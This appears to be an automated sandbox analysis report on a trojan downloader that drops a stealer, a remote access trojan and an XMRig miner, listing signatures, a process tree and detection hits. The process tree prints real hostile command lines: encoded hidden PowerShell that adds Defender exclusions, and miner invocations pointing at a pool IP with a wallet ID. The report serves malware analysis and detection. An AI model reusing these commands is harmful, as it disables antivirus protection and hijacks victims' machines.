Edit tour
Windows
Analysis Report
SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Overview
General Information
Detection
PureLog Stealer, Xmrig, zgRAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Detected Stratum mining protocol
Downloads files with wrong headers with respect to MIME Content-Type
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Child Process of AspNetCompiler
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe (PID: 5904 cmdline:
"C:\Users\ user\Deskt op\Securit eInfo.com. Trojan.Dow nLoader46. 57007.1242 4.22631.ex e" MD5: D18E6C991FA548D0CF39EA1586738D2F) - SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe (PID: 412 cmdline:
"C:\Users\ user\Deskt op\Securit eInfo.com. Trojan.Dow nLoader46. 57007.1242 4.22631.ex e" MD5: D18E6C991FA548D0CF39EA1586738D2F)
- powershell.exe (PID: 1560 cmdline:
powershell .exe -Exec utionPolic y Bypass - WindowStyl e Hidden - NoProfile -enc QQBkA GQALQBNAHA AUAByAGUAZ gBlAHIAZQB uAGMAZQAgA C0ARQB4AGM AbAB1AHMAa QBvAG4AUAB hAHQAaAAgA EMAOgBcAFU AcwBlAHIAc wBcAGIAcgB vAGsAXABBA HAAcABEAGE AdABhAFwAT ABvAGMAYQB sACwAQwA6A FwAVQBzAGU AcgBzAFwAY gByAG8AawB cAEEAcABwA EQAYQB0AGE AXABMAG8AY wBhAGwAXAB UAGUAbQBwA FwAOwAgAEE AZABkAC0AT QBwAFAAcgB lAGYAZQByA GUAbgBjAGU AIAAtAEUAe ABjAGwAdQB zAGkAbwBuA FAAcgBvAGM AZQBzAHMAI ABLAGUAeQB 3AG8AcgBkA HMALgBlAHg AZQA7AA== MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1696 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Keywords.exe (PID: 1568 cmdline:
C:\Users\u ser\AppDat a\Local\Lo cal\jautwk \Keywords. exe MD5: D18E6C991FA548D0CF39EA1586738D2F) - Keywords.exe (PID: 64 cmdline:
"C:\Users\ user\AppDa ta\Local\L ocal\jautw k\Keywords .exe" MD5: D18E6C991FA548D0CF39EA1586738D2F) - MSBuild.exe (PID: 4456 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\MSBu ild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) - MSBuild.exe (PID: 6972 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\MSB uild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
- powershell.exe (PID: 4668 cmdline:
powershell .exe -Exec utionPolic y Bypass - WindowStyl e Hidden - NoProfile -enc QQBkA GQALQBNAHA AUAByAGUAZ gBlAHIAZQB uAGMAZQAgA C0ARQB4AGM AbAB1AHMAa QBvAG4AUAB hAHQAaAAgA EMAOgBcAFU AcwBlAHIAc wBcAGIAcgB vAGsAXABBA HAAcABEAGE AdABhAFwAT ABvAGMAYQB sACwAQwA6A FwAVQBzAGU AcgBzAFwAY gByAG8AawB cAEEAcABwA EQAYQB0AGE AXABMAG8AY wBhAGwAXAB UAGUAbQBwA FwAOwAgAEE AZABkAC0AT QBwAFAAcgB lAGYAZQByA GUAbgBjAGU AIAAtAEUAe ABjAGwAdQB zAGkAbwBuA FAAcgBvAGM AZQBzAHMAI ABLAGUAeQB 3AG8AcgBkA HMALgBlAHg AZQA7AA== MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4576 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- fdyryi.exe (PID: 6100 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\fdyryi. exe MD5: 14E3B32935D7CC340AD1AF8EAE56505B) - fdyryi.exe (PID: 3852 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\fdyryi .exe" MD5: 14E3B32935D7CC340AD1AF8EAE56505B)
- Keywords.exe (PID: 512 cmdline:
C:\Users\u ser\AppDat a\Local\Lo cal\jautwk \Keywords. exe MD5: D18E6C991FA548D0CF39EA1586738D2F) - Keywords.exe (PID: 1568 cmdline:
"C:\Users\ user\AppDa ta\Local\L ocal\jautw k\Keywords .exe" MD5: D18E6C991FA548D0CF39EA1586738D2F)
- powershell.exe (PID: 4172 cmdline:
powershell .exe -Exec utionPolic y Bypass - WindowStyl e Hidden - NoProfile -enc QQBkA GQALQBNAHA AUAByAGUAZ gBlAHIAZQB uAGMAZQAgA C0ARQB4AGM AbAB1AHMAa QBvAG4AUAB hAHQAaAAgA EMAOgBcAFU AcwBlAHIAc wBcAGIAcgB vAGsAXABBA HAAcABEAGE AdABhAFwAU gBvAGEAbQB pAG4AZwBcA E4AYQBtAGU AZABQAGUAc gBtAGkAcwB zAGkAbwBuA FMAZQB0AHM AXABBAGwAZ wBvAHIAaQB 0AGgAbQBUA HkAcABlAC4 AZQB4AGUAL ABDADoAXAB XAGkAbgBkA G8AdwBzAFw ATQBpAGMAc gBvAHMAbwB mAHQALgBOA EUAVABcAEY AcgBhAG0AZ QB3AG8AcgB rADYANABcA HYANAAuADA ALgAzADAAM wAxADkAXAB BAGQAZABJA G4AUAByAG8 AYwBlAHMAc wAuAGUAeAB lACwAQwA6A FwAVQBzAGU AcgBzAFwAY gByAG8AawB cAEEAcABwA EQAYQB0AGE AXABMAG8AY wBhAGwAXAB UAGUAbQBwA FwAIAAtAEY AbwByAGMAZ QA7ACAAQQB kAGQALQBNA HAAUAByAGU AZgBlAHIAZ QBuAGMAZQA gAC0ARQB4A GMAbAB1AHM AaQBvAG4AU AByAG8AYwB lAHMAcwAgA EMAOgBcAFc AaQBuAGQAb wB3AHMAXAB NAGkAYwByA G8AcwBvAGY AdAAuAE4AR QBUAFwARgB yAGEAbQBlA HcAbwByAGs ANgA0AFwAd gA0AC4AMAA uADMAMAAzA DEAOQBcAEE AZABkAEkAb gBQAHIAbwB jAGUAcwBzA C4AZQB4AGU ALABDADoAX ABVAHMAZQB yAHMAXABiA HIAbwBrAFw AQQBwAHAAR ABhAHQAYQB cAFIAbwBhA G0AaQBuAGc AXABOAGEAb QBlAGQAUAB lAHIAbQBpA HMAcwBpAG8 AbgBTAGUAd ABzAFwAQQB sAGcAbwByA GkAdABoAG0 AVAB5AHAAZ QAuAGUAeAB lAA== MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2932 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- AlgorithmType.exe (PID: 5892 cmdline:
C:\Users\u ser\AppDat a\Roaming\ NamedPermi ssionSets\ AlgorithmT ype.exe MD5: 14E3B32935D7CC340AD1AF8EAE56505B) - AlgorithmType.exe (PID: 6812 cmdline:
"C:\Users\ user\AppDa ta\Roaming \NamedPerm issionSets \Algorithm Type.exe" MD5: 14E3B32935D7CC340AD1AF8EAE56505B) - aspnet_compiler.exe (PID: 5572 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\as pnet_compi ler.exe MD5: DF5419B32657D2896514B6A1D041FE08) - aspnet_compiler.exe (PID: 4648 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\a spnet_comp iler.exe" MD5: DF5419B32657D2896514B6A1D041FE08) - pjmskbbdr.exe (PID: 2996 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\pjmskb bdr.exe" MD5: E0DF4BE1D5288BC84AE493177B88D175) - RegAsm.exe (PID: 3560 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - AddInProcess.exe (PID: 3844 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\Ad dInProcess .exe -o 91 .92.246.62 :39005 -u ZEPHYR3aJa 7ZSZrgUcNC WyDb7gCYGV rMsacmxB3p sE2TXsoq7w sZU1WdWheF CfaKvLCLc4 VHzZdzvA8N fmwfW133Sm qm93PzMze4 T.RIG_CPU -p x --alg o rx/0 --c pu-max-thr eads-hint= 50 MD5: 929EA1AF28AFEA2A3311FD4297425C94) - AddInProcess.exe (PID: 2440 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\Ad dInProcess .exe -o 91 .92.246.62 :39005 -u ZEPHYR3aJa 7ZSZrgUcNC WyDb7gCYGV rMsacmxB3p sE2TXsoq7w sZU1WdWheF CfaKvLCLc4 VHzZdzvA8N fmwfW133Sm qm93PzMze4 T.RIG_CPU -p x --alg o rx/0 --c pu-max-thr eads-hint= 50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
zgRAT | zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. | No Attribution |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
Click to see the 76 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
Click to see the 74 entries |
Bitcoin Miner |
---|
Source: | Author: Joe Security: |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Kiran kumar s, oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira: |
Source: | URL Reputation: |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Bitcoin Miner |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | TCP traffic: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: | |||
Source: | Key opened: |
Source: | Code function: | 0_2_05F5C70E | |
Source: | Code function: | 0_2_05F5AF80 | |
Source: | Code function: | 0_2_05F5AF70 | |
Source: | Code function: | 5_2_05D3B1D0 | |
Source: | Code function: | 5_2_05D3BD37 | |
Source: | Code function: | 5_2_05D3BD38 | |
Source: | Code function: | 15_2_00007FF7C1064A58 | |
Source: | Code function: | 23_2_00007FF7C1044A58 |
Networking |
---|
Source: | TCP traffic: |
Source: | Bad PDF prefix: |